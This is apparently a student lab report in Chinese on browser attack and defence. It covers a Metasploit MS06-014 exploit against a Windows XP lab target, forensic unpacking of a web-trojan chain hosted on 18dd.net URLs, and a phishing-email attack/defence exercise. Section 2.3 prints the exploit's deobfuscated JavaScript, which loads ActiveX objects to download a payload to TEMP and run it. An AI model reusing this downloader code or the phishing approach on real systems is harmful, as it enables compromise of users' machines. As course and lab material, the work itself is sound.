1.實踐內容

1.1 web瀏覽器滲透攻擊

任務：使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗，體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。

實驗步驟：

①選擇使用Metasploit中的MS06-014滲透攻擊模組

②選擇PAYLOAD為任意遠端Shell連線

③設定伺服器地址和URL引數，執行exploit，構造出惡意網頁木馬指令碼

④在靶機環境中啟動瀏覽器，驗證與伺服器的連通性，並訪問而已網頁木馬指令碼URL

⑤在攻擊機的Metasploit軟體中檢視滲透攻擊狀態，並通過成功滲透攻擊後建立起的遠端控制會話SESSION，在靶機上遠端執行命令

1.2 取證分析實踐—網頁木馬攻擊場景分析

實踐過程：

①首先你應該訪問start.html，在這個檔案中給出了new09.htm的地址，

②在進入 htm 後，每解密出一個檔案地址，請對其作 32 位 MD5 雜湊，以雜湊值為檔名到 http://192.168.68.253/scom/hashed/雜湊值下去下載對應的檔案(注意:檔名中的英文字母為小寫，且沒有副檔名)，即為解密出的地址對應的檔案。

③如果解密出的地址給出的是網頁或指令碼檔案，請繼續解密。

④如果解密出的地址是二進位制程式檔案，請進行靜態反彙編或動態除錯。

⑤重複以上過程直到這些檔案被全部分析完成。

1.3 攻防對抗實踐—web瀏覽器滲透攻擊攻防

攻擊方使用Metasploit構造出至少兩個不同Web瀏覽端軟體安全漏洞的滲透攻擊程式碼，並進行混淆處理之後組裝成一個URL，通過具有欺騙性的電子郵件傳送給防守方。

防守方對電子郵件中的掛馬連結進行提取、解混淆分析、嘗試恢復出滲透程式碼的原始形態，並分析這些滲透程式碼都是攻擊哪些Web瀏覽端軟體的哪些安全漏洞。

2.實踐過程

2.1 web瀏覽器滲透攻擊

任務：使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗，體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。
本次所使用到的兩個虛擬機器分別為：
攻擊機：kali IP地址為192.168.1.107，如下圖所示：

靶機：windows xp professional IP地址為192.168.1.106：

攻擊機和靶機均設定在橋接模式下，測試兩者的連通性如下圖所示：

具體的攻擊過程如下：
首先在kali虛擬機器上開啟終端，進入root模式，並且開啟msfconsole，如下圖所示：

搜尋MS06-014滲透攻擊模組並使用：

接下來使用命令show payloads檢視payloads，圖中所標即為我們這次實驗所需使用的payload，如下圖所示：

之後分別使用如下圖中所示命令設定本次攻擊的引數：

設定完之後使用show options檢視引數：

準備好之後使用命令run發動本次攻擊：

之後使用靶機訪問上圖中所標出的網址，訪問結果如下圖所示：

靶機訪問之後，可以看到攻擊機獲得了一個session，使用命令sessions+session序號開啟該會話，之後就可以獲得靶機的系統訪問權，如下圖所示：

由上圖可知，本次攻擊攻擊成功，成功獲得了目標靶機的系統訪問許可權。

2.2 取證分析實踐—網頁木馬攻擊場景分析

首先我們訪問start.html檔案，用記事本開啟如下圖所示：

開啟之後搜尋new09.htm，共找到了兩處：
urlresult="new09.htm";
和
可以發現new09.htm與start.html檔案在同一個目錄下，同樣下載下來並用記事本開啟，如下圖所示：

可以看到 new09.htm 檔案中，用 iframe 引用了一個 http://aa.18dd.net/aa/kl.htm 檔案，
又用 javascript 引用了一個 http://js.users.51.la/1299644.js 檔案。
我們分別對它們做MD5雜湊求值，如下圖所示：

按照http://192.168.68.253/scom/hashed/+雜湊值的方式分別下載這兩個檔案，
下載好之後，分別開啟兩個檔案，如下圖所示：

和

上圖中紅線標出部分的後一部分即為加密金鑰，將該加密金鑰在下圖中所示網站進行轉換得：

由上圖可知進行轉換後為script;
知道了加密金鑰，那我們就將上述檔案進行解密，得到的結果如下：

接著對引號內的內容進行解密得：

再按照說明的提示，分別對“http://aa.18dd.net/aa/1.js”、“http://aa.18dd.net/aa/b.js”、
“http://aa.18dd.net/aa/pps.js”和“http://down.18dd.net/bb/bd.cab”求取MD5雜湊值如下圖所示：

得到了這些雜湊值之後，就可以組裝成相應的地址進行下載這些檔案，接下來我們依次分析這些檔案；
首先我們來分析檔案1.js：

解密該十六進位制加密得：

由上圖可知，這個檔案前面部分下載了一個 http://down.18dd.net/bb/014.exe 的可執行檔案，後面部分
是對 ADODB 漏洞的繼續利用。
下面我們接著來看檔案b.js：

解密之後得：

接下來我們來看pps.js檔案：

解密該八進位制加密得：

由上圖可知，該檔案同樣存在shellcode；

解壓cab壓縮檔案得到bd.exe檔案；
然後我們分別對上述分析過程中所產生的可執行檔案路徑進行雜湊計算，如下圖所示：

於是目前我們有了四個 exe 檔案，即 014.exe，bf.exe，pps.exe和bd.exe。
更重要的是，我們發現這四個檔案在資源管理器中顯示出同樣的大小。進一步對檔案內容進行 MD5 雜湊計算得出結論，這四個檔案內容完全相同！
因此我們接下來只需對其中的一個檔案進行分析即可；
首先使用工具PEID檢視該軟體的加殼資訊：

發現該可執行程式經DELPHI工具加殼；
然後我們使用超級巡警自動脫殼機對它進行脫殼處理：

脫殼成功後使用軟體IDA開啟脫殼後的程式，如下圖所示：

點開strings檢視具體的字串資訊：

從中可以分析出該軟體具有一些惡意操作，推測為木馬程式；
接著我們使用360安全衛士的木馬查殺工具進行掃描一下這些程式，掃描結果如下圖所示：

從中可以很明顯地看出上述這些程式全都為惡意木馬程式；至此這些可執行程式分析完畢。

2.3 攻防對抗實踐—web瀏覽器滲透攻擊攻防

本次實驗我們所使用的虛擬機器分別為：
攻擊機：kali IP地址為：192.168.1.106
靶機：Windows xp professional IP地址為：192.168.1.107；如下圖所示：

接下來我們開啟msfconsole並設定相關引數進行攻擊，具體的攻擊過程如下：

在設定好具體的攻擊引數之後，使用命令run開啟攻擊：

開啟攻擊之後我們編寫一封欺騙性電子郵件傳送給目標靶機使用者，編寫的電子郵件具體內容如下圖所示：

其中，超連結地地址設定為開啟攻擊後攻擊機所給出的地址，具體地址在上述圖片中已標出；
傳送之後，目標靶機使用者開啟該電子郵件並點選郵件中所給出的超連結地址，結果如下圖所示：

這時候檢視攻擊機終端中所接收到的資訊發現建立了一個會話，我們使用命令sessions+會話序號開啟該會話並使用相關命令進行測試，測試結果說明攻擊成功，具體資訊如下圖所示：

此時回到靶機頁面，點選滑鼠右鍵：

選中view source檢視網頁原始碼：

發現語句之間隔了很多空格，然後我們在如下網站中使用線上html格式化壓縮工具進行壓縮：

壓縮結果如下圖所示：

在上圖中標出了一些關鍵的函式，函式具體資訊如下：

function FOZNSUqAVhL(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}
function DJXqZATTf(a){var s=FOZNSUqAVhL(a,"WScript.Shell");var o=FOZNSUqAVhL(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload';var xml=null;var bin=e.Item("TEMP")+"\\EONVFedsZYIKzToBkkd.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}
function LzcycrnCHeqNYnWQOikD(){var i=0;var t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E30}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}',null);while(t[i]){var a=null;if(t[i].substring(0,1)=='{'){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=FOZNSUqAVhL(a,"WScript.Shell");if(b){DJXqZATTf(a);return(0)}}catch(e){}}i++}}

其中還包括著一個可執行檔案的相關操作：
EONVFedsZYIKzToBkkd.exe
經查詢相關資料得上述這些資訊正好是MS06-014漏洞的相關資訊。

3.學習中遇到的問題及解決

• 問題1：一開始在做實驗第一部分的時候實施攻擊一直攻擊不成功
• 問題1解決方案：將攻擊機和靶機都設定在同一個網段內，並且靶機更改為Windows xp professional靶機，使用的payload同樣也更換為windows/shell/bind_tcp

4.實踐總結

本次實踐得內容主要是圍繞著瀏覽器安全攻防展開的，具體主要包括web瀏覽器滲透攻擊、取證分析-網頁木馬攻擊場景分析、攻防對抗-web瀏覽器滲透攻擊攻防等相關的瀏覽器安全攻擊與防禦技術；通過本次實踐，我對網路攻擊與防禦技術特別是關於瀏覽器安全攻防方面有了一個更深的瞭解，豐富了自己對網路攻防的認識同時也提高了自身對於網路攻擊與防禦技術的能力。

參考資料

《網路攻擊與防禦技術》